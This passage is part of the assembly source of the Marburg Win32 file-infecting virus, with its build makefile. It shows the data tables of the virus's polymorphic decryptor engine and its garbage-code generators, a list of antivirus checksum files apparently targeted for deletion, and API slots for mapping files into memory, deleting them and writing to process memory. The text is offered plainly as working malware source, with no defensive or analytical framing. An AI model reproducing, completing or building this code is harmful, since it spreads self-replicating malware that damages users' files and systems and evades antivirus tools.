dd offset szAvData_03
|
||
|
||
end_AV_files equ this byte
|
||
|
||
szAvData_00 db "ANTI-VIR.DAT",00h
|
||
szAvData_01 db "CHKLIST.MS",00h
|
||
szAvData_02 db "AVP.CRC",00h
|
||
szAvData_03 db "IVB.NTZ",00h
|
||
|
||
;Search mask for FindFirstFile and FindNextFile
|
||
|
||
szSearch db "*.*",00h
|
||
|
||
;Infection time
|
||
|
||
inf_time equ this byte
|
||
|
||
inf_year dw 0000h
|
||
inf_month dw 0000h
|
||
inf_dayofweek dw 0000h
|
||
inf_day dw 0000h
|
||
inf_hour dw 0000h
|
||
inf_minute dw 0000h
|
||
inf_second dw 0000h
|
||
inf_millisec dw 0000h
|
||
|
||
;Number of bytes to restore at host entry-point
|
||
|
||
insert_size dd 00000000h
|
||
|
||
;Initialized data used by the polymorphic engine
|
||
|
||
;Register table
|
||
;
|
||
; - Register mask
|
||
; - Register flags
|
||
|
||
tbl_regs equ this byte
|
||
|
||
db 00000000b,REG_READ_ONLY ;eax
|
||
db 00000011b,00h ;ebx
|
||
db 00000001b,00h ;ecx
|
||
db 00000010b,00h ;edx
|
||
db 00000110b,REG_NO_8BIT ;esi
|
||
db 00000111b,REG_NO_8BIT ;edi
|
||
db 00000101b,REG_NO_8BIT ;ebp
|
||
|
||
end_regs equ this byte
|
||
|
||
;Aliases for reg table structure
|
||
|
||
REG_MASK equ 00h
|
||
REG_FLAGS equ 01h
|
||
|
||
;Bit aliases for reg flags
|
||
|
||
REG_IS_INDEX equ 01h
|
||
REG_IS_COUNTER equ 02h
|
||
REG_READ_ONLY equ 04h
|
||
REG_NO_8BIT equ 08h
|
||
|
||
;Initial reg flags
|
||
|
||
tbl_startup equ this byte
|
||
|
||
db REG_READ_ONLY ;eax
|
||
db 00h ;ebx
|
||
db 00h ;ecx
|
||
db 00h ;edx
|
||
db REG_NO_8BIT ;esi
|
||
db REG_NO_8BIT ;edi
|
||
db REG_NO_8BIT ;ebp
|
||
|
||
;Code that does not disturb reg values
|
||
|
||
tbl_save_code equ this byte
|
||
|
||
clc
|
||
stc
|
||
cmc
|
||
cld
|
||
std
|
||
|
||
end_save_code equ this byte
|
||
|
||
;Generators for get_delta
|
||
|
||
tbl_delta_mode equ this byte
|
||
|
||
dd offset delta_method_1
|
||
dd offset delta_method_2
|
||
dd offset delta_method_3
|
||
|
||
end_delta_mode equ this byte
|
||
|
||
;Generators for [reg] indexing mode
|
||
|
||
tbl_idx_reg equ this byte
|
||
|
||
dd offset xx_inc_reg
|
||
dd offset xx_dec_reg
|
||
dd offset xx_not_reg
|
||
dd offset xx_add_reg
|
||
dd offset xx_sub_reg
|
||
dd offset xx_xor_reg
|
||
|
||
;Generators for [reg+imm] indexing mode
|
||
|
||
tbl_dis_reg equ this byte
|
||
|
||
dd offset yy_inc_reg
|
||
dd offset yy_dec_reg
|
||
dd offset yy_not_reg
|
||
dd offset yy_add_reg
|
||
dd offset yy_sub_reg
|
||
dd offset yy_xor_reg
|
||
|
||
;Generators for [reg+reg] indexing mode
|
||
|
||
tbl_xtended equ this byte
|
||
|
||
dd offset zz_inc_reg
|
||
dd offset zz_dec_reg
|
||
dd offset zz_not_reg
|
||
dd offset zz_add_reg
|
||
dd offset zz_sub_reg
|
||
dd offset zz_xor_reg
|
||
|
||
;Generators for [reg+reg+imm] indexing mode
|
||
|
||
tbl_paranoia equ this byte
|
||
|
||
dd offset ii_inc_reg
|
||
dd offset ii_dec_reg
|
||
dd offset ii_not_reg
|
||
dd offset ii_add_reg
|
||
dd offset ii_sub_reg
|
||
dd offset ii_xor_reg
|
||
|
||
;Opcodes for math reg,imm
|
||
|
||
tbl_math_imm equ this byte
|
||
|
||
db 0C0h ;add
|
||
db 0C8h ;or
|
||
db 0E0h ;and
|
||
db 0E8h ;sub
|
||
db 0F0h ;xor
|
||
db 0D0h ;adc
|
||
db 0D8h ;sbb
|
||
|
||
end_math_imm equ this byte
|
||
|
||
;Magic aliases
|
||
|
||
MAGIC_PUTKEY equ 01h
|
||
MAGIC_PUTDISP equ 02h
|
||
MAGIC_ENDSTR equ 0FFh
|
||
MAGIC_ENDKEY equ 0FEh
|
||
MAGIC_CAREEBP equ 00h
|
||
MAGIC_NOTEBP equ 0FFh
|
||
|
||
;Magic data
|
||
|
||
xx_inc_reg db 0FEh
|
||
db MAGIC_CAREEBP
|
||
db 00h
|
||
db 00h
|
||
dd offset x_inc_reg_byte
|
||
dd offset x_inc_reg_word
|
||
dd offset x_inc_reg_dword
|
||
|
||
xx_dec_reg db 0FEh
|
||
db MAGIC_CAREEBP
|
||
db 08h
|
||
db 00h
|
||
dd offset x_dec_reg_byte
|
||
dd offset x_dec_reg_word
|
||
dd offset x_dec_reg_dword
|
||
|
||
xx_not_reg db 0F6h
|
||
db MAGIC_CAREEBP
|
||
db 10h
|
||
db 00h
|
||
dd offset x_not_reg_byte
|
||
dd offset x_not_reg_word
|
||
dd offset x_not_reg_dword
|
||
|
||
xx_add_reg db 80h
|
||
db MAGIC_CAREEBP
|
||
db 00h
|
||
db MAGIC_PUTKEY
|
||
dd offset x_add_reg_byte
|
||
dd offset x_add_reg_word
|
||
dd offset x_add_reg_dword
|
||
|
||
xx_sub_reg db 80h
|
||
db MAGIC_CAREEBP
|
||
db 28h
|
||
db MAGIC_PUTKEY
|
||
dd offset x_sub_reg_byte
|
||
dd offset x_sub_reg_word
|
||
dd offset x_sub_reg_dword
|
||
|
||
xx_xor_reg db 80h
|
||
db MAGIC_CAREEBP
|
||
db 30h
|
||
db MAGIC_PUTKEY
|
||
dd offset x_xor_reg_byte
|
||
dd offset x_xor_reg_word
|
||
dd offset x_xor_reg_dword
|
||
|
||
yy_inc_reg db 0FEh
|
||
db MAGIC_NOTEBP
|
||
db 80h
|
||
db MAGIC_PUTDISP
|
||
dd offset x_inc_reg_byte
|
||
dd offset x_inc_reg_word
|
||
dd offset x_inc_reg_dword
|
||
|
||
yy_dec_reg db 0FEh
|
||
db MAGIC_NOTEBP
|
||
db 88h
|
||
db MAGIC_PUTDISP
|
||
dd offset x_dec_reg_byte
|
||
dd offset x_dec_reg_word
|
||
dd offset x_dec_reg_dword
|
||
|
||
yy_not_reg db 0F6h
|
||
db MAGIC_NOTEBP
|
||
db 90h
|
||
db MAGIC_PUTDISP
|
||
dd offset x_not_reg_byte
|
||
dd offset x_not_reg_word
|
||
dd offset x_not_reg_dword
|
||
|
||
yy_add_reg db 80h
|
||
db MAGIC_NOTEBP
|
||
db 80h
|
||
db MAGIC_PUTKEY or MAGIC_PUTDISP
|
||
dd offset x_add_reg_byte
|
||
dd offset x_add_reg_word
|
||
dd offset x_add_reg_dword
|
||
|
||
yy_sub_reg db 80h
|
||
db MAGIC_NOTEBP
|
||
db 0A8h
|
||
db MAGIC_PUTKEY or MAGIC_PUTDISP
|
||
dd offset x_sub_reg_byte
|
||
dd offset x_sub_reg_word
|
||
dd offset x_sub_reg_dword
|
||
|
||
yy_xor_reg db 80h
|
||
db MAGIC_NOTEBP
|
||
db 0B0h
|
||
db MAGIC_PUTKEY or MAGIC_PUTDISP
|
||
dd offset x_xor_reg_byte
|
||
dd offset x_xor_reg_word
|
||
dd offset x_xor_reg_dword
|
||
|
||
zz_inc_reg db 0FEh
|
||
db MAGIC_CAREEBP
|
||
db 04h
|
||
db 00h
|
||
dd offset x_inc_reg_byte
|
||
dd offset x_inc_reg_word
|
||
dd offset x_inc_reg_dword
|
||
|
||
zz_dec_reg db 0FEh
|
||
db MAGIC_CAREEBP
|
||
db 0Ch
|
||
db 00h
|
||
dd offset x_dec_reg_byte
|
||
dd offset x_dec_reg_word
|
||
dd offset x_dec_reg_dword
|
||
|
||
zz_not_reg db 0F6h
|
||
db MAGIC_CAREEBP
|
||
db 14h
|
||
db 00h
|
||
dd offset x_not_reg_byte
|
||
dd offset x_not_reg_word
|
||
dd offset x_not_reg_dword
|
||
|
||
zz_add_reg db 80h
|
||
db MAGIC_CAREEBP
|
||
db 04h
|
||
db MAGIC_PUTKEY
|
||
dd offset x_add_reg_byte
|
||
dd offset x_add_reg_word
|
||
dd offset x_add_reg_dword
|
||
|
||
zz_sub_reg db 80h
|
||
db MAGIC_CAREEBP
|
||
db 2Ch
|
||
db MAGIC_PUTKEY
|
||
dd offset x_sub_reg_byte
|
||
dd offset x_sub_reg_word
|
||
dd offset x_sub_reg_dword
|
||
|
||
zz_xor_reg db 80h
|
||
db MAGIC_CAREEBP
|
||
db 34h
|
||
db MAGIC_PUTKEY
|
||
dd offset x_xor_reg_byte
|
||
dd offset x_xor_reg_word
|
||
dd offset x_xor_reg_dword
|
||
|
||
ii_inc_reg db 0FEh
|
||
db MAGIC_NOTEBP
|
||
db 84h
|
||
db MAGIC_PUTDISP
|
||
dd offset x_inc_reg_byte
|
||
dd offset x_inc_reg_word
|
||
dd offset x_inc_reg_dword
|
||
|
||
ii_dec_reg db 0FEh
|
||
db MAGIC_NOTEBP
|
||
db 8Ch
|
||
db MAGIC_PUTDISP
|
||
dd offset x_dec_reg_byte
|
||
dd offset x_dec_reg_word
|
||
dd offset x_dec_reg_dword
|
||
|
||
ii_not_reg db 0F6h
|
||
db MAGIC_NOTEBP
|
||
db 94h
|
||
db MAGIC_PUTDISP
|
||
dd offset x_not_reg_byte
|
||
dd offset x_not_reg_word
|
||
dd offset x_not_reg_dword
|
||
|
||
ii_add_reg db 80h
|
||
db MAGIC_NOTEBP
|
||
db 84h
|
||
db MAGIC_PUTKEY or MAGIC_PUTDISP
|
||
dd offset x_add_reg_byte
|
||
dd offset x_add_reg_word
|
||
dd offset x_add_reg_dword
|
||
|
||
ii_sub_reg db 80h
|
||
db MAGIC_NOTEBP
|
||
db 0ACh
|
||
db MAGIC_PUTKEY or MAGIC_PUTDISP
|
||
dd offset x_sub_reg_byte
|
||
dd offset x_sub_reg_word
|
||
dd offset x_sub_reg_dword
|
||
|
||
ii_xor_reg db 80h
|
||
db MAGIC_NOTEBP
|
||
db 0B4h
|
||
db MAGIC_PUTKEY or MAGIC_PUTDISP
|
||
dd offset x_xor_reg_byte
|
||
dd offset x_xor_reg_word
|
||
dd offset x_xor_reg_dword
|
||
|
||
;Reverse-code strings
|
||
|
||
x_inc_reg_byte db 02h,0FEh,0C8h,MAGIC_ENDSTR
|
||
x_inc_reg_word db 02h,66h,48h,MAGIC_ENDSTR
|
||
x_inc_reg_dword db 01h,48h,MAGIC_ENDSTR
|
||
x_dec_reg_byte db 02h,0FEh,0C0h,MAGIC_ENDSTR
|
||
x_dec_reg_word db 02h,66h,40h,MAGIC_ENDSTR
|
||
x_dec_reg_dword db 01h,40h,MAGIC_ENDSTR
|
||
x_not_reg_byte db 02h,0F6h,0D0h,MAGIC_ENDSTR
|
||
x_not_reg_word db 03h,66h,0F7h,0D0h,MAGIC_ENDSTR
|
||
x_not_reg_dword db 02h,0F7h,0D0h,MAGIC_ENDSTR
|
||
x_add_reg_byte db 01h,2Ch,MAGIC_ENDKEY
|
||
x_add_reg_word db 02h,66h,2Dh,MAGIC_ENDKEY
|
||
x_add_reg_dword db 01h,2Dh,MAGIC_ENDKEY
|
||
x_sub_reg_byte db 01h,04h,MAGIC_ENDKEY
|
||
x_sub_reg_word db 02h,66h,05h,MAGIC_ENDKEY
|
||
x_sub_reg_dword db 01h,05h,MAGIC_ENDKEY
|
||
x_xor_reg_byte db 01h,34h,MAGIC_ENDKEY
|
||
x_xor_reg_word db 02h,66h,35h,MAGIC_ENDKEY
|
||
x_xor_reg_dword db 01h,35h,MAGIC_ENDKEY
|
||
|
||
;Decryptor styles
|
||
|
||
tbl_styles equ this byte
|
||
|
||
dd offset style_gen_1
|
||
dd offset style_gen_2
|
||
dd offset style_gen_3
|
||
dd offset style_gen_4
|
||
dd offset style_gen_5
|
||
dd offset style_gen_6
|
||
|
||
end_styles equ this byte
|
||
|
||
style_gen_1 dd offset gen_get_delta
|
||
dd offset gen_fix_ptr
|
||
dd offset gen_load_ctr
|
||
dd offset gen_decrypt
|
||
dd offset gen_next_step
|
||
dd offset gen_next_ctr
|
||
dd offset gen_loop
|
||
|
||
style_gen_2 dd offset gen_get_delta
|
||
dd offset gen_load_ctr
|
||
dd offset gen_fix_ptr
|
||
dd offset gen_decrypt
|
||
dd offset gen_next_step
|
||
dd offset gen_next_ctr
|
||
dd offset gen_loop
|
||
|
||
style_gen_3 dd offset gen_load_ctr
|
||
dd offset gen_get_delta
|
||
dd offset gen_fix_ptr
|
||
dd offset gen_decrypt
|
||
dd offset gen_next_step
|
||
dd offset gen_next_ctr
|
||
dd offset gen_loop
|
||
|
||
style_gen_4 dd offset gen_get_delta
|
||
dd offset gen_fix_ptr
|
||
dd offset gen_load_ctr
|
||
dd offset gen_decrypt
|
||
dd offset gen_next_ctr
|
||
dd offset gen_next_step
|
||
dd offset gen_loop
|
||
|
||
style_gen_5 dd offset gen_get_delta
|
||
dd offset gen_load_ctr
|
||
dd offset gen_fix_ptr
|
||
dd offset gen_decrypt
|
||
dd offset gen_next_ctr
|
||
dd offset gen_next_step
|
||
dd offset gen_loop
|
||
|
||
style_gen_6 dd offset gen_load_ctr
|
||
dd offset gen_get_delta
|
||
dd offset gen_fix_ptr
|
||
dd offset gen_decrypt
|
||
dd offset gen_next_ctr
|
||
dd offset gen_next_step
|
||
dd offset gen_loop
|
||
|
||
;Garbage code generators
|
||
|
||
tbl_garbage equ this byte
|
||
|
||
dd offset gen_save_code ;clc stc cmc cld std
|
||
dd offset g_movreg32imm ;mov reg32,imm
|
||
dd offset g_movreg16imm ;mov reg16,imm
|
||
dd offset g_movreg8imm ;mov reg8,imm
|
||
dd offset g_movregreg32 ;mov reg32,reg32
|
||
dd offset g_movregreg16 ;mov reg16,reg16
|
||
dd offset g_movregreg8 ;mov reg8,reg8
|
||
dd offset g_mathregimm32 ;math reg32,imm
|
||
dd offset g_mathregimm16 ;math reg16,imm
|
||
dd offset g_mathregimm8 ;math reg8,imm
|
||
dd offset g_push_g_pop ;push reg/garbage/pop reg
|
||
dd offset g_jump_u ;jump/rnd block
|
||
dd offset g_jump_c ;jump conditional/garbage
|
||
dd offset g_movzx_movsx ;movzx/movsx reg32,reg16
|
||
|
||
end_garbage equ this byte
|
||
|
||
;Original code at host entry point
|
||
|
||
entry_code db BUFFER_EP dup (00h)
|
||
|
||
;Polymorphic procedures works with byte/word/dword
|
||
;We let here a dword to avoid buffer overwrites
|
||
|
||
safety_01 dd 00000000h
|
||
|
||
;Polymorphic decryptor buffer
|
||
|
||
poly_decryptor db DECRYPTOR_SIZE dup (00h)
|
||
|
||
inf_end equ this byte
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
;Virus uninitialized data
|
||
|
||
a_Kernel32 dd 00000000h
|
||
a_User32 dd 00000000h
|
||
a_GetModuleH dd 00000000h
|
||
a_GetProcAddr dd 00000000h
|
||
|
||
;API entry point for each viral function
|
||
|
||
viral_addresses equ this byte
|
||
|
||
a_CreateFile dd 00000000h
|
||
a_CreateFileMap dd 00000000h
|
||
a_MapViewOfFile dd 00000000h
|
||
a_UnmapView dd 00000000h
|
||
a_CloseHandle dd 00000000h
|
||
a_FindFirst dd 00000000h
|
||
a_FindNext dd 00000000h
|
||
a_FindClose dd 00000000h
|
||
a_VirtualAlloc dd 00000000h
|
||
a_GetWindowsDir dd 00000000h
|
||
a_GetSystemDir dd 00000000h
|
||
a_GetCurDir dd 00000000h
|
||
a_SetFileAttr dd 00000000h
|
||
a_SetFileTime dd 00000000h
|
||
a_DeleteFile dd 00000000h
|
||
a_GetCurProc dd 00000000h
|
||
a_WriteProcMem dd 00000000h
|
||
a_LoadLibrary dd 00000000h
|
||
a_GetSysTime dd 00000000h
|
||
|
||
;Misc variables
|
||
|
||
CreateFile_h dd 00000000h
|
||
Mapping_h dd 00000000h
|
||
Search_h dd 00000000h
|
||
File_Attr dd 00000000h
|
||
search_raw dd 00000000h
|
||
original_size dd 00000000h
|
||
h_icon dd 00000000h
|
||
dc_screen dd 00000000h
|
||
|
||
;Data used by the polymorphic engine
|
||
|
||
rnd32_seed dd 00000000h ;Seed for random number generator
|
||
ptr_disp dd 00000000h ;Displacement from index
|
||
end_value dd 00000000h ;Index end value
|
||
delta_call dd 00000000h ;Used into delta_offset routines
|
||
loop_point dd 00000000h ;Start address of decryption loop
|
||
crypt_key dd 00000000h ;Encryption key
|
||
oper_size db 00h ;Size used (1=Byte 2=Word 4=Dword)
|
||
index_mask db 00h ;Mask of register used as index
|
||
counter_mask db 00h ;Mask of register used as counter
|
||
build_flags db 00h ;Some decryptor flags
|
||
recursive_level db 00h ;Garbage recursive layer
|
||
|
||
;Decryptor flags aliases
|
||
|
||
CRYPT_DIRECTION equ 01h
|
||
CRYPT_CMPCTR equ 02h
|
||
CRYPT_CDIR equ 04h
|
||
CRYPT_SIMPLEX equ 10h
|
||
CRYPT_COMPLEX equ 20h
|
||
|
||
;Buffer to convert file time to system time
|
||
|
||
my_system_time equ this byte
|
||
|
||
time_year dw 0000h
|
||
time_month dw 0000h
|
||
time_dayofweek dw 0000h
|
||
time_day dw 0000h
|
||
time_hour dw 0000h
|
||
time_minute dw 0000h
|
||
time_seconds dw 0000h
|
||
time_milisec dw 0000h
|
||
|
||
;Buffer for \WINDOWS and \SYSTEM directories
|
||
|
||
szWorkDir db MAX_PATH dup (00h)
|
||
|
||
;Data about found files
|
||
|
||
my_FindData db SIZEOF_WIN32_FIND_DATA dup (00h)
|
||
|
||
;This will be the place for the virus copy
|
||
|
||
mem_end equ this byte
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
virseg ends
|
||
|
||
end host_entry
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
-------->8 cut here ---------------------------------------------------------
|
||
|
||
# Marburg makefile
|
||
|
||
# make -B Will build wap32.exe
|
||
# make -B -DDEBUG Will build the debug version of wap32.exe
|
||
|
||
NAME = WAP32
|
||
OBJS = $(NAME).obj
|
||
ASMS = $(NAME).asm
|
||
|
||
!if $d(DEBUG)
|
||
TASMPARAM= /ml /m5 /la /zi
|
||
TLINKPARAM= -Tpe -c -s -v -ap
|
||
!else
|
||
TASMPARAM= /ml /m5 /q /zn
|
||
TLINKPARAM= -Tpe -c -x -ap
|
||
!endif
|
||
|
||
!if $d(MAKEDIR)
|
||
IMPORT=$(MAKEDIR)\..\lib\import32
|
||
!else
|
||
IMPORT=import32
|
||
!endif
|
||
|
||
|
||
$(NAME).EXE: $(OBJS) $(DEF)
|
||
tlink32 $(TLINKPARAM) $(OBJS),$(NAME),, $(IMPORT)
|
||
|
||
.asm.obj:
|
||
tasm32 $(TASMPARAM) $(ASMS)
|